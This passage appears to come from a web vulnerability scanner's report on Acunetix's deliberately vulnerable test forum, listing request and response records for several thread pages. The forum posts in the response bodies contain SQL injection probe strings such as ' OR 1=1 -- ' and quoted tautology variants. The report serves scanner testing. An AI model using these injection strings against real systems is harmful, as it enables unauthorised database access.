tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- tinyMCE 